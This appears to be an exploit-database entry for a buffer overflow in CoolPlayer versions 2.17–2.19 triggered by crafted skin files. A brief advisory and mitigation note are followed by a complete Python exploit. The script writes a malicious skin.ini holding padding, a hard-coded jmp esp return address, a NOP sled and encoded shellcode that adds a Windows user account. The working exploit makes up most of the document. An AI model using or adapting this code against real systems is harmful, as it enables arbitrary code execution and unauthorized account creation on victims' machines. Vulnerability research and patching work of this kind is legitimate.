CoolPlayer (Skin) Buffer Overflow

vendor:

CoolPlayer

by:

Encrypt3d.M!nd

9.3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: CoolPlayer

Affected Version From: 2.17

Affected Version To: 2.19

Patch Exists: YES

Related CWE: N/A

CPE: a:coolplayer:coolplayer

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2009

CoolPlayer (Skin) Buffer Overflow

CoolPlayer is prone to a buffer overflow vulnerability when processing specially crafted skin files. An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.

Mitigation:

Upgrade to the latest version of CoolPlayer or apply the appropriate patch.

Source

Exploit-DB raw data:

# CoolPlayer (Skin) Buffer Overflow
# maybe all versions are affected  :) 
# By:Encrypt3d.M!nd
#
# Orginal Exploit: by r0ut3r
# http://www.milw0rm.com/exploits/7536
#
# i've test it on my box(winxp sp3) and didn't work
# so i've re-wrote the exploit and this is workin
# tested: Windows xp sp3 patched
# version tested:2.17,2.18,2.19
#
# Greetz:-=Mizo=-,L!0n,El Mariachi,MiNi SpIder,GGy,and all my friends
###################################################

chars = "A"*1511

eip = "\x6B\x8C\x49\x7E" #user32.dll jmp esp

header = "[CoolPlayer Skin]\nPlaylistSkin="


# win32_adduser -  PASS=t35t EXITFUNC=seh USER=t35t Size=489
Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x57"
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x38"
"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x38"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x45\x46\x52\x46\x50\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34"
"\x4b\x58\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58"
"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x43\x45\x38\x42\x4c\x4a\x37"
"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x38\x42\x37\x4e\x41\x4d\x4a"
"\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b"
"\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x33\x4f\x35\x41\x33"
"\x48\x4f\x42\x56\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x47"
"\x42\x35\x4a\x36\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x36\x4a\x49"
"\x50\x4f\x4c\x48\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x46\x4d\x46"
"\x46\x36\x50\x42\x45\x36\x4a\x37\x45\x56\x42\x52\x4f\x42\x43\x56"
"\x42\x42\x50\x36\x45\x46\x46\x57\x42\x52\x45\x47\x43\x47\x45\x46"
"\x44\x37\x42\x32\x46\x47\x43\x43\x45\x43\x46\x57\x42\x52\x46\x47"
"\x43\x43\x45\x33\x46\x47\x42\x42\x4f\x32\x41\x34\x46\x54\x46\x54"
"\x42\x52\x48\x42\x48\x32\x42\x42\x50\x46\x45\x36\x46\x57\x42\x32"
"\x4e\x36\x4f\x56\x43\x46\x41\x36\x4e\x36\x47\x56\x44\x37\x4f\x36"
"\x45\x37\x42\x37\x42\x32\x41\x44\x46\x46\x4d\x56\x49\x56\x50\x56"
"\x49\x46\x43\x57\x46\x57\x44\x57\x41\x56\x46\x37\x4f\x46\x44\x37"
"\x43\x57\x42\x42\x46\x37\x43\x33\x45\x53\x46\x47\x42\x52\x4f\x52"
"\x41\x54\x46\x34\x46\x34\x42\x50\x5a");

poc = (header+chars+eip+"\x90"*10+shellcode)

file = open('skin.ini','w+')
file.write(poc)
file.close()

# milw0rm.com [2008-12-22]